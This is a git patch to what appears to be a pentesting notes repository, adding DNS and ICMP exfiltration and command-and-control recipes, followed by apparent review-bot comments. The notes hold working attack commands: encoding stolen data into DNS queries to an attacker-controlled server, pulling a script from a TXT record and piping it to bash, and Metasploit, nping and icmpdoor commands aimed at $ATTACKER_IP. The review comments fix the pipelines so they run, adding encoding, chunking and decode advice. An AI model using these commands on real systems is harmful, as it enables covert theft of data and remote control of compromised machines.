From 5236e6a477b6158c01b77c462c52d19a7b4fba8d Mon Sep 17 00:00:00 2001 From: whx Date: Tue, 30 Aug 2022 22:16:10 +0200 Subject: [PATCH] bump --- exfiltration/dns/dns.md | 113 +++++++++++++++++++++++++++++++--------- exfiltration/icmp.md | 64 +++++++++++++++++++++++ exfiltration/links.txt | 1 + 3 files changed, 153 insertions(+), 25 deletions(-) create mode 100644 exfiltration/icmp.md create mode 100644 exfiltration/links.txt diff --git a/exfiltration/dns/dns.md b/exfiltration/dns/dns.md index d5436f6..3a1a9e2 100644 --- a/exfiltration/dns/dns.md +++ b/exfiltration/dns/dns.md @@ -4,35 +4,16 @@ * [Zones](https://www.cloudflare.com/learning/dns/glossary/dns-zone/) * [Records](https://www.cloudflare.com/learning/dns/dns-records/) -## Tunneling -* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git) -* Start server on an outside DNS server. This may be a evs. -```sh -iodined -b 47110-f 10.0.0.1 tunnel.test.com -``` -* Use client via -```sh -iodine -f -r tunnel.test.com -``` -* `NS` record of the owned domain should contain the subdomain, e.g. `tunnel.test.com` -* Client gets a tunnel IP in the range of `10.0.0.0/8` -* Check connection via -```sh -ping -``` -* Generate ssh-key and put in on the server -* Dynamic port forwarding to server via -```sh -ssh @10.0.0.1 -D 8080 -``` -* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy +## Queries + +### nslookup -## nslookup ```sh nslookup type=txt ``` -## Reverse lookup +### Reverse lookup + * Stored inside `PTR` record * Reverse IP may look like `.in-addr.arpa.`, but not via `drill` or `dig` ```sh 
@@ -40,10 +21,92 @@ drill -x +short ``` ## Exfiltration + * Add data to UDP DNS requests * Capture traffic on an owned DNS server -* `253` is the max length of a DNS name +* `253` is the max length of a DNS name, excluding dots +* `63` is the mx length of subdomains * Encode the payload to hide it ## Infiltration + * Inside `TXT` or any other possible records + +## Usage + +### Manual Tunneling + +Preconditions are: + 1. Domain with an `A` record + 2. `NS` record to controlled DNS to resolve the domain query + +* Attach the encoded payload as the subdomain +```sh +base64 -w0 | fold -w 24 | sed -r 's/.*/&.example.com/' +``` + +* Query the DNS server +```sh +base64 -w0 | fold -w 24 | sed -r 's/.*/&.example.com/' | awk '{print "dig +short $1"}' | bash +``` + +* Optionally putting the payload in a single query via +```sh +base64 -w0 | fold -w 24 | sed 's/.*/&./' | tr -d '\n' | sed 's/$/example.com/' | awk '{print "dig +short" $1}' | bash +``` + +* Decode received data on the controlled DNS server via +```sh +echo "DomainBase64encoded.example.com" | sed 's/\.example\.com//;s/\.//g' | base64 -d +``` + +### Tunneling via Iodine + +* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git) +* Encapsulate protocols in side the DNS tunnel + +* Start server on an outside DNS server. This may be a evs. +```sh +iodined -b -f 10.0.0.1 -c -P tunnel.test.com +``` + +* Use client via +```sh +iodine -f -r -P tunnel.test.com +``` + +* `NS` record of the owned domain should contain the subdomain, e.g. 
`tunnel.test.com` +* Client gets a tunnel IP in the range of `10.0.0.0/8` +* Check connection via +```sh +ping +``` + +* Generate ssh-key and put in on the server +* Dynamic port forwarding to the network through the server as a proxy via ssh +```sh +ssh @10.0.0.1 -4 -f -N -D <8080/1080> +``` + +* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy, or proxychains +```sh +proxychains curl http://$TARGET_IP/ +curl --socks5 localhost:1080 http://$ +``` + +### C2 over DNS + +* Preconditions are the same as [Manual Tunneling](#Manual Tunneling) + * Plus: Data to control the appliances will be put into `TXT` record + * Data to control the appliances may be a shell script sending payloads via ICMP data field, DNS subdomains or execute something locally on the target + +* Encode the payload and add it as `TXT` record +```sh +base64 ./script.sh +``` + +* Query and execute on target +```sh +dig +short -t TXT script.example.com | sed 's/\"//g'| base64 -d | bash +``` + diff --git a/exfiltration/icmp.md b/exfiltration/icmp.md new file mode 100644 index 0000000..b667f4a --- /dev/null +++ b/exfiltration/icmp.md 
@@ -0,0 +1,64 @@ +# ICMP Exfiltration + +* [ICMP Types](https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtm) + +* Type 0, which is Echo Reply contains an optional data field inside the header +``` + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Type | Code | Checksum | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Identifier | Sequence Number | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| | ++ Data + +| | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +``` + +## Usage + +* The `Pattern` parameter can be used to pad the bytes. From the manual +``` + -p pattern + You may specify up to 16 “pad” bytes to fill out the packet you send. This is useful for diagnosing + data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones. +``` + +* Pad hex values +```sh +ping $TARGET_IP -c 1 -p $(echo "data payload" | xxd -p ) +``` + +### Metasploit ICMP Exfiltration + +* Awaiting ICMP data on Attacker +```sh +use auxiliary/server/icmp_exfil +set BPF_FILTER icmp and not src $ATTACKER_IP +set interface +run +``` + +* Exfiltrating from target via `ping` shown above or use `nping` +* Starting the transmission via `nping` and BOF +```sh +sudo nping --icmp -c 1 $ATTACKER_IP --data-string "BOFpayload.txt" +sudo nping --icmp -c 1 $ATTACKER_IP --data-string "actual payload" +sudo nping --icmp -c 1 $ATTACKER_IP --data-string "EOF" +``` + +### C2 over ICMP + +* Use [krabelize's ICMPdoor](https://github.com/krabelize/icmpdoor) + +* On target +```sh +sudo icmpdoor -i -d $ATTACKER_IP +``` + +* On attacker +```sh +sudo icmp-cnc -i -d $TARGET_IP +``` diff --git a/exfiltration/links.txt b/exfiltration/links.txt new file mode 100644 index 0000000..dfbc500 --- /dev/null +++ b/exfiltration/links.txt @@ -0,0 +1 @@ +https://lots-project.com/
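Review bot: the `nslookup type=txt` example that now sits under the new `### nslookup` heading (first dns.md hunk) is not valid syntax: without a leading dash, `nslookup` treats `type=txt` as the name to resolve, and the name to query is missing entirely. It should read `nslookup -type=txt $DOMAIN`. The reverse-lookup bullet in the same hunk, "Reverse IP may look like `.in-addr.arpa.`, but not via `drill` or `dig`", is hard to follow; say it directly: `dig -x $IP` and `drill -x $IP` take the plain address and build the reversed `in-addr.arpa` name for you, whereas a manual `PTR` query needs the octets reversed and `.in-addr.arpa` appended. The regrouping under `## Queries` with `###` subheadings is otherwise consistent with the rest of the file.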
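Review bot: the `awk` stages in the Manual Tunneling section (second dns.md hunk) do not produce runnable `dig` commands. In `... | awk '{print "dig +short $1"}' | bash` the `$1` sits inside the awk string literal, so awk emits the literal text `dig +short $1` and bash then expands `$1` to the empty string; in the single-query variant, `awk '{print "dig +short" $1}'` concatenates without a space and yields `dig +shortAAAA.example.com`, which dig rejects as an invalid option. Use `awk '{print "dig +short " $1}'` or simply `| xargs -n1 dig +short`. Two facts in the Exfiltration bullets are also inverted: 253 is the maximum length of a full name including the dots (255 octets on the wire), not excluding them, and 63 is the maximum length of one label (the text between two dots), not of "subdomains"; "mx" should read "max". Given those limits, the single-query form (`fold -w 24` chunks joined with dots, then `example.com` appended) holds about nine chunks, roughly 160 bytes of raw input, so anything larger has to fall back to one chunk per query. The encoding choice matters as well: base64 emits `+`, `/` and `=`, which are not valid hostname characters, and a resolver path that applies 0x20 case randomisation will corrupt the mixed-case alphabet before it reaches the authoritative server; base32 or hex is the safe choice, and each query should carry a sequence number so the receiver can reorder and deduplicate chunks, which the current pipeline does not do. Smaller points in the same hunk: `iodined -b -f 10.0.0.1 -c -P tunnel.test.com` and `iodine -f -r -P tunnel.test.com` lack the arguments that `-b` (port) and `-P` (password) require, so as written `-P` swallows `tunnel.test.com` as the password; if these were `<port>`/`<password>` placeholders they have been lost, and `$VAR`-style placeholders like the `$TARGET_IP` used later survive rendering. "This may be a evs." and "in side" are typos (a VPS; inside), "User proxy server" should be "Use a proxy server", and `[Manual Tunneling](#Manual Tunneling)` needs the slug form `#manual-tunneling`. In the C2 section, `base64 ./script.sh` wraps at 76 columns and a single TXT string is limited to 255 bytes, so build the record from `base64 -w0 script.sh | fold -w 255` as multiple strings; on the receiving side `dig +short -t TXT` prints those as `"aaa" "bbb"`, and after `sed 's/\"//g'` the remaining spaces make GNU `base64 -d` fail with "invalid input", so add `tr -d ' '` (or use `base64 -di`) before piping to `bash`.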
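Review bot: the type description at the top of the new icmp.md is backwards for the use case that follows: `ping` and `nping --icmp` send Echo Request (Type 8), and Echo Reply (Type 0) is what comes back, so the exfiltration path described below carries the data in Type 8 messages; the data field is also part of the message body after the 8-byte header, not "inside the header". Rewording the bullet to "Echo Request (Type 8) and Echo Reply (Type 0) carry an optional variable-length data field after the header" would match the diagram. The IANA link is missing its last character (`icmp-parameters.xhtml`). The `ping -p` example has two practical limits worth stating next to it: `-p` accepts at most 16 bytes (32 hex digits), so longer input is truncated or rejected depending on the implementation, and `echo` appends a newline that ends up as a trailing `0a`; `printf '%s' "data payload" | xxd -p` avoids the newline, and longer data has to be split with `fold -w 32` into one `ping -c 1 -p` per chunk. The pattern is also repeated to fill the default 56-byte payload, so the listener sees each chunk several times per packet. As in the dns.md hunk, several placeholders appear to have been lost: `set interface` has no interface name, and both `icmpdoor -i -d $ATTACKER_IP` and `icmp-cnc -i -d $TARGET_IP` are missing the interface that `-i` requires; `$VAR` names survive rendering, the angle-bracket ones evidently did not.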
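Review bot: `links.txt` adds a bare URL with no context; a short description beside it (lots-project.com is the Living Off Trusted Sites list of legitimate domains that can carry exfiltration or C2 traffic) would make the file useful, and since the other notes in this directory are markdown, a `links.md` bullet list would match the existing convention.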